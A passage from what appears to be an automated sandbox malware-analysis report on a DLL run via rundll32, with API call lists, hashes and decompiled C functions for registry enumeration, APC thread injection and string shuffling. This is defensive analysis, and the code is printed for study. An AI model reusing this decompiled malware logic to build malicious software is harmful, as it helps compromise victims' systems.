                                              • Part of subcall function 049F5296: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,049F4BF5,?,?,?,?,00000102,049F5388,?), ref: 049F5300
                                              • Part of subcall function 049F5296: lstrcpy.KERNEL32(00000000,00000000), ref: 049F5310
                                            • SetEvent.KERNEL32(?), ref: 049F4C3B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3739416942-0
                                            • Opcode ID: 9b7f30f8a240ec6bf93c852b0fbad8d4beb4c8af2cf48dd542fc88a65f27f8ed
                                            • Instruction ID: 267ec8b5b52a6e08622cd1d285d535b1bf96598b7dd94ddc538045a55a67bff3
                                            • Opcode Fuzzy Hash: 9b7f30f8a240ec6bf93c852b0fbad8d4beb4c8af2cf48dd542fc88a65f27f8ed
                                            • Instruction Fuzzy Hash: 1201AD31204200AADB306F60EE44F9B7AA9FF94325F210B34F652920F0E721F804EB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05816B34 Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,0580A82F), ref: 05816B4B
                                            • QueueUserAPC.KERNEL32(00000000,00000000,?,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B60
                                            • GetLastError.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B6B
                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B75
                                            • CloseHandle.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B7C
                                            • SetLastError.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B85
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                            • String ID:
                                            • API String ID: 3832013932-0
                                            • Opcode ID: 2ad6f1adc303bec198ded9d945d61827054576a3366962c89d99ad26fbaa4d9e
                                            • Instruction ID: 2816f5028262a52c80040a64e779fff9a6da9a8bed6e6f481353b46493e39da1
                                            • Opcode Fuzzy Hash: 2ad6f1adc303bec198ded9d945d61827054576a3366962c89d99ad26fbaa4d9e
                                            • Instruction Fuzzy Hash: 7BF01232215220BFDB326BA2AC0AF5BBF69FB59761F018404FE45D2160DB25A850CBB5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F6E20 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E049F6E20(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x49fa3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E049F4208( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E049F3DCA(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E049F4C73(_a8);
						goto L29;
					}
					_t64 =  *0x49fa318; // 0x4f79da0
					_t16 = _t64 + 0xc; // 0x4f79ec2
					_t65 = E049F4208(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d049f90, executed
						_t67 = E049F4C88(_t97,  *_t33, _t91, _a8,  *0x49fa3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x49fa348; // 0x57d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x49fba3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x49fb8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E049F26E7(_t69,  *0x49fa3d4,  *0x49fa3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x49fa348; // 0x57d5a8
									_t44 = _t71 + 0x49fb846; // 0x74666f53
									_t73 = E049F4208(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d049f90
										E049F3B76( *_t47, _t91, _a8,  *0x49fa3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d049f90
										E049F3B76( *_t49, _t91, _t99,  *0x49fa3d0, _a16);
										E049F4C73(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d049f90, executed
									E049F3B76( *_t40, _t91, _a8,  *0x49fa3d8, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d049f90
									E049F3B76( *_t43, _t91, _a8,  *0x49fa3d0, _a16);
								}
								if( *_t101 != 0) {
									E049F4C73(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d049f90, executed
					_t81 = E049F4E0B( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d049f90
							E049F4C88(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E049F4C73(_t100);
						_t98 = _a16;
					}
					E049F4C73(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E049F799E(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x49fa3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                                            0x049f6e20
                                            0x049f6e29
                                            0x049f6e30
                                            0x049f6e35
                                            0x049f6ea2
                                            0x049f6ea8
                                            0x049f6ead
                                            0x049f6eb4
                                            0x049f6eb9
                                            0x049f6ebe
                                            0x049f7029
                                            0x049f7030
                                            0x049f7030
                                            0x049f7035
                                            0x049f7037
                                            0x049f7037
                                            0x049f7040
                                            0x049f7040
                                            0x049f6ec4
                                            0x049f6ec9
                                            0x049f6ed0
                                            0x049f701f
                                            0x049f7022
                                            0x00000000
                                            0x049f7022
                                            0x049f6ed6
                                            0x049f6edb
                                            0x049f6ede
                                            0x049f6ee3
                                            0x049f6ee8
                                            0x049f6f31
                                            0x049f6f31
                                            0x049f6f44
                                            0x049f6f47
                                            0x049f6f4e
                                            0x049f6f54
                                            0x049f6f5b
                                            0x049f6f65
                                            0x049f6f65
                                            0x049f6f5d
                                            0x049f6f5d
                                            0x049f6f5d
                                            0x049f6f5d
                                            0x049f6f87
                                            0x049f6f8f
                                            0x049f6fbd
                                            0x049f6fc2
                                            0x049f6fc9
                                            0x049f6fce
                                            0x049f6fd2
                                            0x049f7004
                                            0x049f6fd4
                                            0x049f6fe1
                                            0x049f6fe4
                                            0x049f6ff4
                                            0x049f6ff7
                                            0x049f6ffd
                                            0x049f6ffd
                                            0x049f6f91
                                            0x049f6f9e
                                            0x049f6fa1
                                            0x049f6fb3
                                            0x049f6fb6
                                            0x049f6fb6
                                            0x049f700e
                                            0x049f701a
                                            0x049f7010
                                            0x049f7013
                                            0x049f7013
                                            0x049f700e
                                            0x049f6f87
                                            0x00000000
                                            0x049f6f4e
                                            0x049f6ef7
                                            0x049f6efa
                                            0x049f6f01
                                            0x049f6f07
                                            0x049f6f0a
                                            0x049f6f0c
                                            0x049f6f18
                                            0x049f6f1b
                                            0x049f6f1b
                                            0x049f6f21
                                            0x049f6f26
                                            0x049f6f26
                                            0x049f6f2c
                                            0x00000000
                                            0x049f6f2c
                                            0x049f6e3a
                                            0x00000000
                                            0x049f6e61
                                            0x049f6e61
                                            0x049f6e6d
                                            0x049f6e80
                                            0x049f6e86
                                            0x049f6e8e
                                            0x00000000
                                            0x049f6e8e

                                            APIs
                                            • StrChrA.SHLWAPI(049F2A82,0000005F,00000000,00000000,00000104), ref: 049F6E53
                                            • lstrcpy.KERNEL32(?,?), ref: 049F6E80
                                              • Part of subcall function 049F4208: lstrlen.KERNEL32(?,00000000,04F79DA0,00000000,049F2263,04F79FC3,69B25F44,?,?,?,?,69B25F44,00000005,049FA00C,4D283A53,?), ref: 049F420F
                                              • Part of subcall function 049F4208: mbstowcs.NTDLL ref: 049F4238
                                              • Part of subcall function 049F4208: memset.NTDLL ref: 049F424A
                                              • Part of subcall function 049F3B76: lstrlenW.KERNEL32(?,?,?,049F6FE9,3D049F90,80000002,049F2A82,049F744C,74666F53,4D4C4B48,049F744C,?,3D049F90,80000002,049F2A82,?), ref: 049F3B9B
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            • lstrcpy.KERNEL32(?,00000000), ref: 049F6EA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                            • String ID: ($\
                                            • API String ID: 3924217599-1512714803
                                            • Opcode ID: 7648a708df4d4901a4d6ebc61b56bc85fee22ed0ebec6bf41e45d479a240e3dd
                                            • Instruction ID: dc3d6ca09d74a652eb7b726826ef7abd946eb0fd23b5123092e5bae4ffbd90d8
                                            • Opcode Fuzzy Hash: 7648a708df4d4901a4d6ebc61b56bc85fee22ed0ebec6bf41e45d479a240e3dd
                                            • Instruction Fuzzy Hash: 62514972510209EFDF21AFA0DC40EAA7BBAEF44354F048574FA1596120E776F925EB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580EAAC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110threadsynchronizationinjectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 0580EADA
                                            • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0580EB64
                                            • WaitForSingleObject.KERNEL32(00000064), ref: 0580EB72
                                            • SuspendThread.KERNEL32(?), ref: 0580EB85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                            • String ID: v
                                            • API String ID: 3168247402-1801730948
                                            • Opcode ID: 2c28030b28e18f22e321b73cca88dcdacfe461fdacbc1211be553e1215b2bb4c
                                            • Instruction ID: 0e8d1d843a0dbc41b7ca53f8292a1e53a68562137cdbed0f43e76b20599d7133
                                            • Opcode Fuzzy Hash: 2c28030b28e18f22e321b73cca88dcdacfe461fdacbc1211be553e1215b2bb4c
                                            • Instruction Fuzzy Hash: 24412871108301AFE761EF54CC85D6BBBE9FB88310F004D29FA95D21A0D732E9558B62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F737F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98registrysynchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F737F(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E049F4DF6(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E049F4C73(_v28);
							goto L17;
						}
						_t42 = E049F6E20(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E049F4C73(_v24);
						_v20 = _v16;
						_t47 = E049F4DF6(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x49fa30c, 0) == 0x102);
				goto L16;
			}

















                                            0x049f737f
                                            0x049f7399
                                            0x049f739c
                                            0x049f739f
                                            0x049f73a2
                                            0x049f73a5
                                            0x049f73ab
                                            0x049f73af
                                            0x049f7489
                                            0x049f748d
                                            0x049f748d
                                            0x049f73b8
                                            0x049f73bf
                                            0x049f73c4
                                            0x049f73c9
                                            0x049f747e
                                            0x049f7481
                                            0x00000000
                                            0x049f7487
                                            0x049f73cf
                                            0x049f73d2
                                            0x049f73d9
                                            0x049f73e3
                                            0x049f73ec
                                            0x049f73f2
                                            0x049f73fa
                                            0x049f7432
                                            0x049f746c
                                            0x049f7472
                                            0x049f7474
                                            0x049f7474
                                            0x049f7476
                                            0x049f7479
                                            0x00000000
                                            0x049f7479
                                            0x049f7447
                                            0x049f744c
                                            0x049f7450
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f7450
                                            0x049f73ff
                                            0x049f740e
                                            0x00000000
                                            0x00000000
                                            0x049f7413
                                            0x049f741c
                                            0x049f741f
                                            0x049f7424
                                            0x049f7429
                                            0x049f7404
                                            0x049f7404
                                            0x00000000
                                            0x049f7404
                                            0x049f742d
                                            0x00000000
                                            0x049f742d
                                            0x049f7401
                                            0x00000000
                                            0x049f7452
                                            0x049f745f
                                            0x00000000

                                            APIs
                                            • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,049F2A82,?), ref: 049F73A5
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • RegEnumKeyExA.KERNEL32(?,?,?,049F2A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,049F2A82), ref: 049F73EC
                                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,049F2A82,?,049F2A82,?,?,?,?,?,049F2A82,?), ref: 049F7459
                                            • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,049F2A82,?), ref: 049F7481
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                            • String ID: !s
                                            • API String ID: 3664505660-1801701826
                                            • Opcode ID: 0c03a2d55e335fdd9ac0d19f627ae61e5f8c8c11130693f31ab2d3323a609c0f
                                            • Instruction ID: b692a648ecbf863cc410f514b898a1e59bef33289e96039f18a8ead64f0cc7c7
                                            • Opcode Fuzzy Hash: 0c03a2d55e335fdd9ac0d19f627ae61e5f8c8c11130693f31ab2d3323a609c0f
                                            • Instruction Fuzzy Hash: 5E314B71D00119BBDF21AFE9DC449EFFFBAEB84314F104176EA61B2150D2742A51DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F2C52 Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 57%
                                            			E049F2C52(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E049F175D();
				if(_t21 != 0) {
					_t59 =  *0x49fa2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x49fa2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x49fa178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E049F5765( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x49fa348; // 0x57d5a8
					if( *0x49fa2fc > 5) {
						_t8 = _t26 + 0x49fb5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x49fb9f5; // 0x44283a44
						_t27 = _t7;
					}
					E049F3EF8(_t27, _t27);
					_t31 = E049F5410(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x49fa310 =  *0x49fa310 ^ 0x81bbe65d;
						_t32 = E049F4DF6(0x60);
						 *0x49fa3cc = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x49fa3cc; // 0x4f795b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x49fa3cc; // 0x4f795b0
							 *_t51 = 0x49fb81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x49fa2d8, 0, 0x43);
							 *0x49fa368 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x49fa2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x49fa348; // 0x57d5a8
								_t13 = _t58 + 0x49fb55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x49f9287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E049F12D3( ~_v8 &  *0x49fa310, 0x49fa00c); // executed
								_t42 = E049F475F(0, _t55, _t63, 0x49fa00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E049F21FC(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E049F6B13(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E049F4ECB(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x49fa17c(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E049F3E6C(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                            0x049f2c52
                                            0x049f2c5c
                                            0x049f2c5f
                                            0x049f2c62
                                            0x049f2c65
                                            0x049f2c6c
                                            0x049f2c6e
                                            0x049f2c7a
                                            0x049f2c7c
                                            0x049f2c7c
                                            0x049f2c85
                                            0x049f2c8b
                                            0x049f2c90
                                            0x049f2caa
                                            0x049f2cb6
                                            0x049f2cb8
                                            0x049f2cbd
                                            0x049f2cc7
                                            0x049f2cc7
                                            0x049f2cbf
                                            0x049f2cbf
                                            0x049f2cbf
                                            0x049f2cbf
                                            0x049f2cce
                                            0x049f2cdb
                                            0x049f2ce2
                                            0x049f2ce7
                                            0x049f2ce7
                                            0x049f2cf0
                                            0x049f2cf3
                                            0x049f2d19
                                            0x049f2d25
                                            0x049f2d2a
                                            0x049f2d2f
                                            0x049f2d31
                                            0x049f2d5d
                                            0x049f2d5f
                                            0x049f2d33
                                            0x049f2d37
                                            0x049f2d3c
                                            0x049f2d41
                                            0x049f2d48
                                            0x049f2d4e
                                            0x049f2d53
                                            0x049f2d59
                                            0x049f2d60
                                            0x049f2d62
                                            0x049f2d64
                                            0x049f2d73
                                            0x049f2d79
                                            0x049f2d7e
                                            0x049f2d80
                                            0x049f2db0
                                            0x049f2db2
                                            0x049f2d82
                                            0x049f2d82
                                            0x049f2d88
                                            0x049f2d95
                                            0x049f2d9b
                                            0x049f2d9b
                                            0x049f2da3
                                            0x049f2dac
                                            0x049f2db3
                                            0x049f2db5
                                            0x049f2db7
                                            0x049f2dbe
                                            0x049f2dcb
                                            0x049f2dd0
                                            0x049f2dd5
                                            0x049f2dd7
                                            0x049f2dd9
                                            0x00000000
                                            0x00000000
                                            0x049f2ddb
                                            0x049f2de0
                                            0x049f2de2
                                            0x049f2de9
                                            0x049f2ded
                                            0x049f2df0
                                            0x049f2e05
                                            0x049f2e09
                                            0x049f2e0e
                                            0x00000000
                                            0x049f2e0e
                                            0x049f2df2
                                            0x049f2df4
                                            0x00000000
                                            0x00000000
                                            0x049f2dff
                                            0x049f2e01
                                            0x049f2e03
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f2e03
                                            0x049f2de6
                                            0x049f2de6
                                            0x049f2db7
                                            0x049f2cf5
                                            0x049f2cf5
                                            0x049f2cfa
                                            0x049f2e10
                                            0x049f2e15
                                            0x049f2e1d
                                            0x049f2e1d
                                            0x00000000
                                            0x049f2e15
                                            0x049f2d00
                                            0x049f2d03
                                            0x049f2d0d
                                            0x049f2d14
                                            0x00000000
                                            0x049f2e25
                                            0x049f2e25
                                            0x049f2e28
                                            0x049f2e2c
                                            0x049f2e2c

                                            APIs
                                              • Part of subcall function 049F175D: GetModuleHandleA.KERNEL32(4C44544E,00000000,049F2C6A,00000001), ref: 049F176C
                                            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 049F2CE7
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • memset.NTDLL ref: 049F2D37
                                            • RtlInitializeCriticalSection.NTDLL(04F79570), ref: 049F2D48
                                              • Part of subcall function 049F4ECB: memset.NTDLL ref: 049F4EE5
                                              • Part of subcall function 049F4ECB: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 049F4F2B
                                              • Part of subcall function 049F4ECB: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 049F4F36
                                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 049F2D73
                                            • wsprintfA.USER32 ref: 049F2DA3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                            • String ID:
                                            • API String ID: 4246211962-0
                                            • Opcode ID: 41c53b6ec6df57ec74f62361c85ccbb6c47255691b9c4ce19b5e78b207bd8b53
                                            • Instruction ID: 046e563aabbdb036584e1f9e44d4a6da0212d1011864c2c6a055b36d033be1a4
                                            • Opcode Fuzzy Hash: 41c53b6ec6df57ec74f62361c85ccbb6c47255691b9c4ce19b5e78b207bd8b53
                                            • Instruction Fuzzy Hash: 5651E771B04215ABEB219FE4DC48FAE7BACEB44714F1448B5EB05D7180E7BAB9508B50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F70AE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 22%
                                            			E049F70AE(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E049F4DF6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E049F4C73(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E049F4DF6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x49fa318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
